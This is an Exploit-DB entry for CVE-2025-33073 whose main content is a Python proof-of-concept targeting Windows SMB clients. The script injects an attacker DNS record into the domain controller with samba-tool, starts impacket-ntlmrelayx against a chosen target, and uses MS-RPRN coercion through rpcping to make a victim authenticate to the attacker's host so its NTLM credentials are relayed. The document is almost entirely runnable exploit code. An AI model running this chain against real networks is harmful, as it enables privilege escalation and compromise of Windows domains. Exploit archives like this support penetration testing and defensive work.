Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)

EDB-ID:

52330

CVE:

2025-33073

EDB Verified:

Author:

Mohammed Idrees Banyamer

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2025-06-15

Vulnerable App: 
#!/usr/bin/env python3
# Exploit Title:  Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-13
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
# CVE: CVE-2025-33073
# Type: Remote
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
# User Interaction: Required (authenticated domain user)
# Remediation Level: Official Fix Available
#
# Affected Versions:
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
# - Windows Server 2022 (including 23H2 editions)
# - Windows Server 2019
# - Windows 10 versions from 1507 up to 22H2
# - Windows Server 2016 and 2008 (with appropriate versions)
#
# Description:
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
# Windows Server 2022, and earlier versions vulnerable to this method.
#
#
# Note: The exploit requires the victim to be an authenticated domain user and the environment
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
#
# DISCLAIMER: For authorized security testing and educational use only.

import argparse
import subprocess
import socket
import time
import sys

def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
    print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
    cmd = [
        "samba-tool", "dns", "add", dns_ip, dc_fqdn,
        record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] DNS record successfully added.")
    except subprocess.CalledProcessError:
        print("[!] Failed to add DNS record. Check credentials and connectivity.")
        sys.exit(1)

def check_record(record_name):
    print("[*] Verifying DNS record propagation...")
    for i in range(10):
        try:
            result = socket.gethostbyname_ex(record_name)
            if result and result[2]:
                print(f"[+] DNS record resolved to: {result[2]}")
                return True
        except socket.gaierror:
            time.sleep(2)
    print("[!] DNS record did not propagate or resolve.")
    return False

def start_ntlmrelay(target):
    print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
    try:
        subprocess.Popen([
            "impacket-ntlmrelayx", "-t", target, "--no-smb-server"
        ])
        print("[*] NTLM relay server started.")
    except Exception as e:
        print(f"[!] Failed to start NTLM relay server: {e}")
        sys.exit(1)

def trigger_coercion(victim_ip, fake_host):
    print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
    cmd = [
        "rpcping",
        "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
        "-s", fake_host,
        "-e", "1234",
        "-a", "n",
        "-u", "none",
        "-p", "none"
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] Coercion RPC call sent successfully.")
    except subprocess.CalledProcessError:
        print("[!] RPC coercion failed. Verify victim connectivity and service status.")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
    parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
    parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
    parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
    parser.add_argument("--target", required=True, help="Target system to relay authentication to")
    parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
    args = parser.parse_args()

    record = "relaytrigger"
    fqdn = f"{record}.{args.dc_fqdn}"

    inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
    if not check_record(fqdn):
        print("[!] DNS verification failed, aborting.")
        sys.exit(1)

    start_ntlmrelay(args.target)
    time.sleep(5)  # Wait for relay server to be ready

    trigger_coercion(args.victim_ip, fqdn)

    print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")

if __name__ == "__main__":
    main()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services